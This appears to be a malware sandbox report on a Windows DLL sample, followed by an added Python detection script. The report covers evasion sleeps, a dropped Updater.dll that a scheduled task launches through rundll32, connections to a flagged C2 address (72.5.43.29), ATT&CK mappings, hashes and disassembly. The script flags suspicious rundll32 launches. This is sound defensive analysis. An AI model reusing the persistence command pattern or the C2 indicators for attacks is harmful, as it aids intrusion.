Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115074E0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,SetProcessDPIAware,DeleteObject
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep | graph_8-9564
Source: C:\Windows\System32\rundll32.exe | Window / User API: threadDelayed 9728
Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\ProgramData\Ventuso LLC\Updater.dll
Source: C:\Windows\System32\loaddll64.exe TID: 7320 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7572 | Thread sleep count: 237 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7572 | Thread sleep time: -237000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7572 | Thread sleep count: 9728 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7572 | Thread sleep time: -9728000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11511610 FindFirstFileExA
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115019C0 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo
Source: C:\Windows\System32\loaddll64.exe | Thread delayed: delay time: 120000
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE1150A088 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11506980 GetProcessHeap,RtlRestoreThreadPreferredUILanguages
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11509564 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE1150ECD0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 72.5.43.29 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11517C10 cpuid
Source: C:\Windows\System32\rundll32.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11509F8C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115050D0 GetVolumeInformationW,GetComputerNameW,GetComputerNameExW,GetUserNameW,OpenMutexW,CloseHandle,GetTickCount,SleepEx
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115069F0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics
MITRE ATT&CK matrix, listed per tactic; a number in parentheses is the count of signatures matched for that technique in this analysis:

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scheduled Task/Job (1); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (111); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (11); Process Injection (111); Regsvr32 (1); Rundll32 (1); DLL Side-Loading (1); File Deletion (1); Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Security Software Discovery (121); Virtualization/Sandbox Evasion (11); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (34)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Screen Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1493196 | Sample: akdn2nefd.bin.dll | Start date: 15/08/2024 | Architecture: WINDOWS | Score: 76
Signatures on the sample (node 2): Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file
Sample (2) started: rundll32.exe (7); loaddll64.exe (11)
rundll32.exe (7): network connection to 72.5.43.29 (49730, 49731, 49734; UNASSIGNED, United States); signatures: System process connects to network (likely due to code injection or exploit); Creates files in the system32 config directory; Drops HTML or HTM files to system directories
loaddll64.exe (11) started: cmd.exe (13); rundll32.exe (15); rundll32.exe (17); 3 other processes
cmd.exe (13) started: rundll32.exe (21)
rundll32.exe (21): dropped C:\ProgramData\Ventuso LLC\Updater.dll (PE32+); signature: Found evasive API chain (may stop execution after checking mutex)

Source | Detection | Scanner
akdn2nefd.bin.dll | 13% | ReversingLabs
akdn2nefd.bin.dll | 12% | Virustotal
Source | Detection | Scanner
C:\ProgramData\Ventuso LLC\Updater.dll | 13% | ReversingLabs
C:\ProgramData\Ventuso LLC\Updater.dll | 12% | Virustotal
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://72.5.43.29/Rt# | 0% | Avira URL Cloud | safe
http://72.5.43.29/2 | 0% | Avira URL Cloud | safe
http://72.5.43.29/ | 0% | Avira URL Cloud | safe
http://72.5.43.29/pt | 0% | Avira URL Cloud | safe
http://72.5.43.29/5.43.29/ttingsE | 0% | Avira URL Cloud | safe
http://72.5.43.29/Gt8 | 0% | Avira URL Cloud | safe
http://72.5.43.29/ttings | 0% | Avira URL Cloud | safe
http://72.5.43.29/$ | 0% | Avira URL Cloud | safe
http://72.5.43.29 | 0% | Avira URL Cloud | safe
http://72.5.43.29/#tT | 0% | Avira URL Cloud | safe
http://72.5.43.29 | 2% | Virustotal
http://72.5.43.29/#tT | 2% | Virustotal
http://72.5.43.29/ | 2% | Virustotal
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://72.5.43.29/ | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://72.5.43.29/Rt# | rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/2 | rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/pt | rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/5.43.29/ttingsE | rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/Gt8 | rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/ttings | rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29/$ | rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://72.5.43.29 | rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://72.5.43.29/#tT | rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
72.5.43.29 | unknown | United States | 16769 | UNASSIGNED | true
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1493196
Start date and time:2024-08-15 05:28:30 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:akdn2nefd.bin.dll
renamed because original name is a hash value
Original Sample Name:akdn2nefd.bin.exe
Detection:MAL
Classification:mal76.evad.winDLL@15/4@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 40
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:30:05 | API Interceptor | 9804378x Sleep call for process: rundll32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
72.5.43.29 | random.dll.dll | malicious | Unknown | 72.5.43.29/
72.5.43.29 | 1337.js | malicious | Unknown | 72.5.43.29/
72.5.43.29 | random.dll.dll | malicious | Unknown | 72.5.43.29/
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNASSIGNED | random.dll.dll | malicious | Unknown | 72.5.43.29
UNASSIGNED | 1337.js | malicious | Unknown | 72.5.43.29
UNASSIGNED | random.dll.dll | malicious | Unknown | 72.5.43.29
UNASSIGNED | b3astmode.arm.elf | malicious | Mirai | 160.79.173.248
UNASSIGNED | hoho.arm.elf | malicious | Mirai | 38.135.252.253
UNASSIGNED | arm.elf | malicious | Mirai | 153.10.195.253
UNASSIGNED | https://survey.zohopublic.com/zs/PYD30j?zs_inviteid=866013344e2f6aaa30b0ce407809ff4bd0ed3ef0b6c505e4b8ed99944a376aa9926823bc48ddf2b3a48337595fd132fdc7dd78d5f9b555e70f8018a33749ece953593d840363543c7e497cb3df5edd8a8ce77772c184384877cf08b30c571942a82188865861cee4768abdb6a85121effaf9893caa395668bdc7d2ea3eb1ad70842f3852386887fd2152473c96af2d214aa22073b82ef4bd897283936adbc27354514f9b6787d1b60b4d554452880bf6 | malicious | Unknown | 199.67.84.65
UNASSIGNED | arm7-20240807-1021.elf | malicious | Mirai | 156.134.164.94
UNASSIGNED | botx.arm.elf | malicious | Mirai | 205.231.152.65
No context
No context
Process:C:\Windows\System32\rundll32.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159232
Entropy (8bit):6.126578601529484
Encrypted:false
SSDEEP:3072:0lCt2jrijQEjnMUWzsjhVPbuGHUluQj6vkZD4vP5iZWyPr:QCIrijNMv6XPbr0kulr
MD5:59B7B8D29252A9128536FBD08D24375F
SHA1:7221B9125608A54F9DD706166F936C16EE23164A
SHA-256:B7AEC5F73D2A6BBD8CD920EDB4760E2EDADC98C3A45BF4FA994D47CA9CBD02F6
SHA-512:70431E0BF3759194CD50F6B567F6DE7C908D13A444D14E7B35EDF10FD88F16E6FE8BF0899307C7215F1EE80FF8E5909211864F4184053D9FA5BF9EC22B1D9CD4
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 13%
  • Antivirus: Virustotal, Detection: 12%, Browse
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....~.X.........." .....|..........p.....................................................`..........................................$......X%..x.......................................T...........................0................................................text....z.......|.................. ..`.rdata.............................@..@.data...X?...@...,..."..............@....pdata...............N..............@..@.gfids...............b..............@..@.rsrc................d..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\rundll32.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Windows\System32\rundll32.exe
File Type:data
Category:dropped
Size (bytes):32
Entropy (8bit):5.0
Encrypted:false
SSDEEP:3:4E6CDri/ENGHn:J6C/ikGHn
MD5:CD337FC63F7D36B9B22881FE45278BBB
SHA1:DBA77555B1E7DD52CB5DDB298B8558DD071F26F6
SHA-256:DFF7255B90139FBC8D3E76F31B480E65FC3EB7F49F70E7876CFB3F1CB56E5123
SHA-512:30E5A2E6147BDF86FB98E00630FF46C0C08D334E9E13CCA16D6535367C5C388C5701889068C1CF11D8E171F125F5FF00B0BC1FD30CA9115774D9CFF5A0FB1218
Malicious:false
Preview:..9..i..V5.f...x&s2.n.....6"
Process:C:\Windows\System32\rundll32.exe
File Type:data
Category:modified
Size (bytes):338
Entropy (8bit):3.568775131260989
Encrypted:false
SSDEEP:6:A+rEsU/82On+SkSJkJAWhAlAtWlubhEZxDh5JDiAjgsW2YRZuy0lWKuV1:A2UhO+fTWlj0b69uAjzvYRQV2
MD5:076377E1702EC729434E5CAE4E7AB54F
SHA1:4BA7BB7EDB9DA0D1B6A71B9F240A7277291028A0
SHA-256:2CFBFA3357D2059DCD05A34AF2A4DF36E0FF3D8753F28A84DBB07A9CD218EA94
SHA-512:9B0A9E338D0B527B0BCBFFF2BDD5A9749A44B6376ADEE60DB56CCE1196410B31D231541CF495999587B46ECA5A043F8AC4E49740EA468FEF78C66EFDABF5F233
Malicious:false
Preview:.......Xw.D.Z...mBF. .....<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...2.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.V.e.n.t.u.s.o. .L.L.C.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...............................................
Decoded: the UTF-16LE strings in the preview read C:\Windows\system32\rundll32.exe, then "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u, then JONES-PC\jones. Each string is preceded by its character count including the terminator (0x21 = 33 and 0x32 = 50, shown as "!" and "2"), which is the layout of a Task Scheduler .job file: application, parameters, author. This is the persistence mechanism behind "Creates job files (autostart)": the scheduled task launches the dropped DLL's Start export through rundll32.exe.
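The job file above starts the dropped DLL through rundll32.exe with an explicit export name (Start) from a user-writable directory (C:\ProgramData). The following Python is an added example, not part of the Joe Sandbox report: it parses rundll32 command lines the way a process-creation detection rule would and flags launches whose DLL lives outside the Windows directory or whose entry point is an ordinal. Only the first event's command line is taken from the report; the other events, the event field names and the trusted-path lists are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Command line recovered from the dropped .job file shown above (decoded from
# its UTF-16LE preview). Everything else in SAMPLE_EVENTS is constructed.
OBSERVED_CMDLINE = (
    r'C:\Windows\system32\rundll32.exe '
    r'"C:\ProgramData\Ventuso LLC\Updater.dll",Start /u'
)

# Constructed process-creation events (field names are our own, not a
# particular log schema). The first one is the observed persistence launch.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"cmdline": OBSERVED_CMDLINE, "parent": r"C:\Windows\System32\svchost.exe"},
    {"cmdline": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"cmdline": r'rundll32.exe "C:\Users\jones\AppData\Local\Temp\x.dll",#1',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"cmdline": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe"},
]

# rundll32 syntax: rundll32[.exe] <dll>,<entry> [arguments]. The DLL may be
# quoted (paths with spaces) or bare; the entry is an export name or #ordinal.
_RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+(?P<dll>"[^"]+"|[^\s,]+),(?P<entry>#?\w+)',
    re.IGNORECASE,
)

# Where an OS-supplied DLL is expected; anything else is user-writable territory.
_TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\temp\\")


def parse_rundll32(cmdline: str) -> Optional[Dict[str, str]]:
    """Split a rundll32 command line into dll, entry point and trailing arguments."""
    m = _RUNDLL32_RE.search(cmdline)
    if m is None:
        return None
    return {
        "dll": m.group("dll").strip('"'),
        "entry": m.group("entry"),
        "args": cmdline[m.end():].strip(),
    }


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per rundll32 launch that deserves an analyst's attention."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        parsed = parse_rundll32(ev["cmdline"])
        if parsed is None:          # bare rundll32.exe or not a rundll32 launch
            continue
        low = parsed["dll"].lower()
        reasons = []
        if low.startswith(_WRITABLE_PREFIXES):
            reasons.append("dll in user-writable location")
        elif not low.startswith(_TRUSTED_PREFIXES):
            reasons.append("dll outside System32/SysWOW64")
        if parsed["entry"].startswith("#"):
            reasons.append("export referenced by ordinal")
        if reasons:
            findings.append({**parsed, "parent": ev["parent"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["dll"], f["entry"], f["args"], f["reasons"])
```

On the observed command line the parser returns the DLL path, the export Start and the argument /u; the triage flags it because the DLL sits under C:\ProgramData, while the shell32.dll control-panel launch passes. In production the parent process is the other signal worth keeping: a scheduled-task launch arrives via the Task Scheduler service, not via a user shell.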
File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):6.126578601529484
TrID:
  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
  • Win64 Executable (generic) (12005/4) 10.17%
  • Generic Win/DOS Executable (2004/3) 1.70%
  • DOS Executable Generic (2002/1) 1.70%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:akdn2nefd.bin.dll
File size:159'232 bytes
MD5:59b7b8d29252a9128536fbd08d24375f
SHA1:7221b9125608a54f9dd706166f936c16ee23164a
SHA256:b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
SHA512:70431e0bf3759194cd50f6b567f6de7c908d13a444d14e7b35edf10fd88f16e6fe8bf0899307c7215f1ee80ff8e5909211864f4184053d9fa5bf9ec22b1d9cd4
SSDEEP:3072:0lCt2jrijQEjnMUWzsjhVPbuGHUluQj6vkZD4vP5iZWyPr:QCIrijNMv6XPbr0kulr
TLSH:2BF32947F6A210EBE9B6C635C9632527FB72385543309B9F4B5446225F237A0EE3DB20
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....~.X.........." .....|..........p.....................................................`................................
Icon Hash:7ae282899bbab082
Entrypoint:0x180009b70
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x180000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x58DA7EDB [Tue Mar 28 15:18:51 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4e07c2fd62376d20191892e1e1215fcd
Instruction (x86-64)
mov qword ptr [rsp+08h], rbx
mov qword ptr [rsp+10h], rsi
push rdi
sub rsp, 20h
mov rdi, r8
mov ebx, edx
mov rsi, rcx
cmp edx, 01h
jne 00007FC13143F4A7h
call 00007FC13143F8A0h
mov r8, rdi
mov edx, ebx
mov rcx, rsi
mov rbx, qword ptr [rsp+30h]
mov rsi, qword ptr [rsp+38h]
add rsp, 20h
pop rdi
jmp 00007FC13143F2F8h
int3
int3
int3
sub rsp, 28h
call 00007FC13143FD28h
test eax, eax
je 00007FC13143F4C3h
mov rax, qword ptr [00000030h]
mov rcx, qword ptr [rax+08h]
jmp 00007FC13143F4A7h
cmp rcx, rax
je 00007FC13143F4B6h
xor eax, eax
cmpxchg qword ptr [0001D744h], rcx
jne 00007FC13143F490h
xor al, al
add rsp, 28h
ret
mov al, 01h
jmp 00007FC13143F499h
int3
int3
int3
sub rsp, 28h
call 00007FC13143FCECh
test eax, eax
je 00007FC13143F4A9h
call 00007FC13143FB17h
jmp 00007FC13143F4BBh
call 00007FC13143FCD4h
mov ecx, eax
call 00007FC1314432B5h
test eax, eax
je 00007FC13143F4A6h
xor al, al
jmp 00007FC13143F4A9h
call 00007FC13144363Ch
mov al, 01h
add rsp, 28h
ret
sub rsp, 28h
xor ecx, ecx
call 00007FC13143F5E6h
test al, al
setne al
add rsp, 28h
ret
int3
int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x224a0 | 0xb8 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x22558 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2b000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x28000 | 0x12cc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x690 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x210d0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x21130 | 0x94 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19000 | 0x380 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x17a90 | 0x17c00 | f1d3c7eb2b4d49aa3c3ced10e0bd2582 | False | 0.5224506578947369 | zlib compressed data | 6.1893577299368605 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x19000 | 0xa0f2 | 0xa200 | d6dd4741e9f4e7b1e9121e139cf8adff | False | 0.4664351851851852 | data | 5.141780189939127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x24000 | 0x3f58 | 0x2c00 | 7c391c5554799b2ddffd0a84cab3699d | False | 0.5725319602272727 | data | 5.855319176049921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x28000 | 0x12cc | 0x1400 | 268043d954d9b8d2fdd1f259ed50df3e | False | 0.466796875 | data | 4.948893002562717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids | 0x2a000 | 0x9c | 0x200 | 9d4de97bca792c2fa369b12a77272c07 | False | 0.25 | data | 1.4611336356506455 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2b000 | 0x1e0 | 0x200 | 94a4bdad46cd2ba4a61ce55d564521bf | False | 0.53125 | data | 4.720822661998389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x690 | 0x800 | 62240c37dc88fd19e8b20ab1a756d13d | False | 0.53515625 | data | 4.932993216789583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x2b060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Imports
KERNEL32.dll | GetLastError, SetLastError, ExpandEnvironmentStringsW, SetCurrentDirectoryW, GetCurrentDirectoryW, CreateFileW, DeleteFileW, GetVolumeInformationW, ReadFile, RemoveDirectoryW, SetFilePointer, WriteFile, SetHandleInformation, CreatePipe, PeekNamedPipe, WaitForSingleObject, CreateMutexW, CreateThread, TerminateProcess, CreateProcessW, GlobalMemoryStatusEx, GetTickCount, GetComputerNameExW, GetModuleFileNameW, GetComputerNameW, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, HeapReAlloc, HeapFree, GetProcessHeap, GetTempFileNameW, GetTempPathW, GetSystemDirectoryW, LocalFree, Sleep, CloseHandle, LoadLibraryW, GetProcAddress, GetModuleHandleW, OpenMutexW, RaiseException, WriteConsoleW, FlushFileBuffers, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, GetACP, GetStdHandle, GetFileType, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, SetStdHandle, GetSystemInfo
ADVAPI32.dll | SystemFunction036, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey
SHELL32.dll | SHGetFolderPathW
ole32.dll | CoTaskMemFree
WS2_32.dll | gethostbyname, inet_ntoa, gethostname, WSAStartup, WSACleanup
Name | Ordinal | Address
DllGetClassObject | 1 | 0x180001dd0
DllRegisterServer | 2 | 0x180001e90
DllRegisterServerEx | 3 | 0x180001e70
DllUnregisterServer | 4 | 0x180001e90
Start | 5 | 0x180001ea0
